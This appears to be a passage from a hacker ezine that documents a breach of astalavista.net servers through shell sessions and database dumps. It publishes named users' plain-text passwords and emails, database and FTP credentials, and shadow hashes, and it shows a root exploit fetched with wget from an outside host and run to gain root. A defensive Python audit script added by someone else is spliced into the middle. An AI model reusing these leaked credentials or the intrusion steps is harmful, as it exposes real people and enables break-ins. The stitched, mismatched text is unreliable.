+------------+----------------------------------+-----------------------------+
| system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
| schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
+------------+----------------------------------+-----------------------------+
4 rows in set (0.04 sec)

mysql> exit;
Bye
================================================================

Whoa... the admin passwords have been found. But what more is there to do with them, since the attacker already has r00t access.
heuheuheuheu :P CONTINUE ..

=================================================================
sh-3.2$ ls -la ~astanet
total 48
drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
-rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
-rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
-rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
-rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
-rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
-rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
-rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
-rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
-rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
-rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
-rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
-rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki

sh-3.2$ head -20 index.php
/**
* Mainfile (external) for astalavistaNET v2.0
*
* @copyright Astalavista IT Engineering GmbH
* @author Thomas Kaelin
* @version 1.0
*/

if ($_SERVER['PHP_SELF'] == '/webcash.php') {
$dontStartSession = false;
} else {
$dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');

sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
-rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
-rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
-rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php

sh-3.2$ cat com.conf.php
[snip]
//member-database
$_CONFIG['db_mem_server'] = 'localhost';
$_CONFIG['db_mem_database'] = 'astanet_membersystem';
$_CONFIG['db_mem_user'] = 'astanet_db';
$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = 'localhost';
$_CONFIG['db_ads_database'] = 'astanet_ads';
$_CONFIG['db_ads_user'] = 'astanet_db';
$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = '212.254.194.163';
$_CONFIG['db_rainbow_database'] = 'rainbow';
$_CONFIG['db_rainbow_user'] = 'dinu';
$_CONFIG['db_rainbow_password'] = 'dinudinu';
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = 'localhost';
$_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
$_CONFIG['db_mailing_lists_user'] = 'astanet_db';
$_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
$_CONFIG['sub_pp_cmd'] = '_xclick';
$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
$_CONFIG['sub_pp_noship'] = '1';
$_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
[snip]

sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off

sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
-rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
-rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
-rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
-rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
-rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
-rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
-rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
-rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
-rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
-rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
-rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
-rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
-rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
-rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
-rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
-rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
-rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php

sh-3.2$ cd ..
sh-3.2$ cd _007
sh-3.2$ ls -la
total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
-rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
-rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap

sh-3.2$ cat .htaccess
authType Basic
authName Admin
authUserFile /home/astanet/auth/.htadm_pwd
require valid-user

sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT

sh-3.2$ mysql -u astanet_db -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 275153
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| test |
+-----------------------+
6 rows in set (0.00 sec)

mysql> use astanet_membersystem
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_astanet_membersystem |
+-----------------------------------+
| blacklist_categories |
| blacklist_content |
| blacklist_levels |
| blacklist_mcset |
| dir_categories |
| dir_comments |
| dir_links |
| dir_temp |
| dir_votes |
| documents |
| documents_categories |
| email_content |
| email_settings |
| exploits |
| exploits_categories |
| exploittree_categories |
| exploittree_exploits |
| home_values |
| iso_countries |
| links_categories |
| links_records |
| links_unauth |
| links_votes |
| log |
| news_categories |
| news_comments |
| news_emoticons |
| news_latest |
| news_messages |
| news_statistics |
| news_votes |
| prices_content |
| prices_offers |
| rss_settings |
| sessions |
| stats_signups |
| u2u2 |
| u2u_contact |
| u2u_settings |
| user_keywords_selected_categories |
| users |
| users_ipn_test |
| users_keyword_values |
| users_profile |
| users_temp |
| users_upgrade |
+-----------------------------------+
46 rows in set (0.00 sec)

mysql> describe users;
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
| user | varchar(50) | NO | | | |
| nickname | varchar(30) | NO | MUL | anonymous | |
| password | varchar(30) | NO | | | |
| userlevel | tinyint(3) | YES | MUL | NULL | |
| exp | int(8) unsigned | NO | | 0 | |
| email | varchar(50) | NO | | | |
| ip | varchar(15) | NO | | 0 | |
| proxy | set('0','1') | NO | | 0 | |
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
| anz_in | tinyint(1) | NO | | -1 | |
| status | tinyint(1) unsigned | NO | | 0 | |
| checked | set('0','1','2') | NO | | 0 | |
| freemember | set('0','1') | NO | | 0 | |
| ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
| lang | tinytext | NO | | | |
| adid | smallint(6) | NO | | 0 | |
| pp_txn_id | varchar(255) | YES | | NULL | |
| cnb_transaction_id | varchar(255) | YES | | NULL | |
| cnb_order_id | varchar(255) | YES | | NULL | |
| cnb_user_id | int(11) | YES | | 0 | |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
22 rows in set (0.01 sec)

mysql> select count(*) as skids from users;
+-------+
| skids |
+-------+
| 25199 |
+-------+
1 row in set (0.00 sec)

mysql> select user,nickname,password,email from users where userlevel = 1;
+--------------------------+----------------------+------------------+-----------------------------------+
| user | nickname | password | email |
+--------------------------+----------------------+------------------+-----------------------------------+
| pascal | prozac | astaman3 | info@astalavista.net |
| Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com |
| qreymer | Palermo | qblsw85iam | eche@home.se |
| Christian Wehrli | g0atherd | hitt?74 | g0atherd@gmx.net |
| Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk |
| Martin Wyss | dinu | kj63;cXy | martin.wyss@astalavista.net |
| Leandro Nery | Timan_no_Sanco | nery2002 | leandronery@hotmail.com |
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1@hotmail.com |
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence@hotmail.com |
| David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
| David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net |
| Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin@astalavista.net |
| Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus@hotmail.com |
| David Ellis | dellis203 | philip | dellis@nightwatchnss.com |
| Lars Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com |
| Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos@gmx.ch |
| Thomas Däppen | daha | asta4tom | thomas.daeppen@astalavista.ch |
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com |
| Fabius Bernet | traviser | wellenreiter100 | fabius.bernet@astalavista.ch |
| Zachary McElroy | duder1 | dirty245dix | mcelroyzj@yahoo.com |
| Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com |
| Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com |
| Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout@webhostline.com |
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch |
| Peter Fisher | cyph3r1 | testZer025435 | cyph3r@astalavista.com |
| sykadul | sykadul | ak29eral | sykadul@gmail.com |
| Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch |
+--------------------------+----------------------+------------------+-----------------------------------+
27 rows in set (0.00 sec)

mysql> exit;
Bye
===========================================================
Here are the admin usernames and passwords, stored as plain text.
It sounds very ironic.
An IT PROFESSIONAL site using plain-text passwords. heuheuheu :P
CONTINUE :P
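As an added, defender-side example (not from the original page or the ezine): the two dumps above show two different storage failures, a varchar(32) column of unsalted hex digests in which two admin accounts carry an identical digest, and a varchar(30) column holding literal passwords. The Python audit below classifies how a password column is stored and flags both problems; the sample rows are constructed for the example and are not the page's data.

```python
import json
import re
from collections import defaultdict

# Storage formats, checked in order. Anything that matches none of them is
# treated as a literal (plain-text) password.
FORMATS = [
    ("bcrypt", re.compile(r"^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$"), "salted"),
    # $1$ (md5crypt), $5$ (sha256crypt), $6$ (sha512crypt): salted, but md5crypt
    # is fast to brute-force; a modern KDF (bcrypt/argon2) is still preferable.
    ("crypt", re.compile(r"^\$(?:1|5|6)\$[^$]{1,16}\$[./A-Za-z0-9]{22,86}$"), "salted"),
    ("unsalted-md5", re.compile(r"^[0-9a-f]{32}$", re.I), "unsalted"),
    ("unsalted-sha1", re.compile(r"^[0-9a-f]{40}$", re.I), "unsalted"),
    ("unsalted-sha256", re.compile(r"^[0-9a-f]{64}$", re.I), "unsalted"),
]

# Constructed sample rows modelled on the two table layouts shown above.
# The digests and passwords here are made up.
SAMPLE_ROWS = [
    ("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),   # bare hex digest
    ("bob", "5f4dcc3b5aa765d61d8327deb882cf99"),     # same digest as alice
    ("carol", "$1$saltsalt$qJH7.N4xYta3aEG/dfqo/0"),  # md5crypt, salted
    ("dave", "Summer2009!"),                          # literal password
    ("erin", "$2b$12$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW"),
]


def classify(stored):
    """Return (format_name, 'salted' | 'unsalted' | 'plaintext') for one value."""
    for name, pattern, kind in FORMATS:
        if pattern.match(stored):
            return name, kind
    return "plaintext", "plaintext"


def audit(rows):
    """rows: iterable of (username, stored_password).

    Returns a summary of how the column is stored and the resulting risk:
    'critical' if any value is plain text, 'high' if any digest is unsalted,
    'ok' otherwise.
    """
    counts = defaultdict(int)
    plaintext_users = []
    by_digest = defaultdict(list)
    for user, stored in rows:
        name, kind = classify(stored)
        counts[name] += 1
        if kind == "plaintext":
            plaintext_users.append(user)
        elif kind == "unsalted":
            by_digest[stored.lower()].append(user)
    # Two users with an identical unsalted digest share a password; a salt
    # would have hidden that, and one cracked digest unlocks the whole group.
    shared = sorted(users for users in by_digest.values() if len(users) > 1)
    if plaintext_users:
        risk = "critical"
    elif by_digest:
        risk = "high"
    else:
        risk = "ok"
    return {
        "counts": dict(counts),
        "plaintext_users": plaintext_users,
        "shared_hashes": shared,
        "risk": risk,
    }


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_ROWS), indent=2))
```

Feeding the script a real export (for example the output of a SELECT on the username and password columns) gives a first-pass answer to "how are these stored?" before any migration to a salted, slow hash is planned.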

===========================================================
sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2$ wget http://anti.sec.labs/g0troot
--13:33:37-- http://anti.sec.labs/g0troot
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18200 (18K) [text/plain]
Saving to: `g0troot'

100%[=======================>] 18,200 58.6K/s in 0.3s

18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]

sh-3.2$ ./g0troot -i x86_64
[+] g0troot - anti.sec.labs
[+] Target: 2.6.18-128.1.10.el5
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

[+] r00tr00t
[~] Executing shell...

sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# cat /etc/shadow
root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
[snip]
admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::

sh-3.2# cat /etc/motd
#####################################################
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
# |__| [__ | |__| | |__| | | | [__ | |__| #
# | | ___] | | | |___ | | \/ | ___] | | | #
# #
#####################################################
# #
# Admin Contact - support@secureservertech.com #
# #
# Available ShortCuts #
# #
# nst - list active connections #
# ddos - shows how many times each ip is connected #
# ltr - restart the webserver #
# phpc - edit the php config file #
# htc - edit the webserver configuration file #
# up - uptime #
# etd - edit the motd of the day file #
# htr - start and restart apache if needed #
# syng - shows active SYN_RECV connections #
# synd - syn flood blocker - "synd -h" for usage #
#####################################################
# NOTES: #
# Last Upgrade - 12-08-2008 by JF #
# My.cnf/Mysql Optimization - 1-28-09 #
# #
# #
# #
#####################################################

sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009

sh-3.2# ls -la
total 453376
drwxr-x--- 15 root root 4096 Jun 4 08:40 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
-rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
-rw------- 1 root root 16836 Jun 4 07:21 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rwx------ 1 root root 1899 Oct 28 2007 bk.sh
-rw-r--r-- 1 root root 1327 Nov 29 2007 cert
-rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
drwx------ 2 root root 4096 Oct 28 2007 .elinks
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
-rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
-rw------- 1 root root 0 Apr 16 13:19 .history
-rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
-rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
-rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
-rw------- 1 root root 35 Jun 2 14:23 .lesshst
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
-rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
-rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
-rwx------ 1 root root 760 Sep 18 2008 lp
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
-rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
-rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
-rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
-rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
-rw------- 1 root root 41 Oct 19 2007 .my.cnf
-rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
-rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
-rw------- 1 root root 41 May 20 2008 .mytop
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
-rw------- 1 root root 1462 Sep 21 2007 opt.php
-rw-r--r-- 1 root root 3371 Sep 22 2007 p
-rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
-rw------- 1 root root 1024 Feb 3 21:32 .rnd
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
drwx------ 2 root root 4096 Oct 10 2008 .ssh
-rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
-rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
-rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
-rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
-rw------- 1 root root 12997 May 16 2008 .viminfo

sh-3.2# cat .bash_history
[snip]
wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz
cd linux-2.6.27.10
sh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
[snip]
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I www.astalavista.ch
[snip]
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
service csf restart
traceroute www.google.ch
tracert www.google.ch
traceroute www.google.ch
locate traceroute
chown 4755 /bin/traceroute
chown 4777 /bin/traceroute
locate ping
chown 4755 /bin/ping
chown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
ls -ali | grep traceroute
chown root traceroute
chmod 4755 traceroute
ls -ali | grep traceroute
traceroute -I www.google.ch
traceroute www.google.ch
whois pmsantos.ch
[snip]
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
top
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
ping www.ssth.ch
ping ssth.ch
nslookup www.google.ch
nslookup www.ssth.ch
man nslookup
ping www.google.ch
nslookup www.google.ch
nslookup www.google.ch
nslookup salfjasdlf.ch
[snip]
openssl passwd -1 sadf
openssl passwd -1 5cZNHstdTy
mysql
mysql
locate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
vi /etc/proftpd.passwd
service proftpd restart
[snip]
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
crontab -l
crontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh
wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
cd lsws-4.0.3
sh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
iostat
whereis iostat
yjm clean all
yum clean all ; yum -y update
iostat
yum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
dmesg -c
sysctl -p
uname -r
cd /usr/src
wget nix101.com/kernels/sstlinux.tar.gz
shutdown -r now
nano -w /boot/grub/grub.conf

sh-3.2# cat .my.cnf
[client]
user=da_admin
password=X9dctmRH

sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
##########################################################
# #
# incremental backup for astalavista.com #
# #
# author: Paulo M. Santos #
# #
##########################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";
# database
DB_HOST="localhost";
DB_USER="contrexxuser2";
DB_PASS="0fEYNZgXz1pKe";
DB_DATABASE1="com_contrexx2_live";
DB_DATABASE2="com_contrexx2";
[snip]
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
close
bye
EOF

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
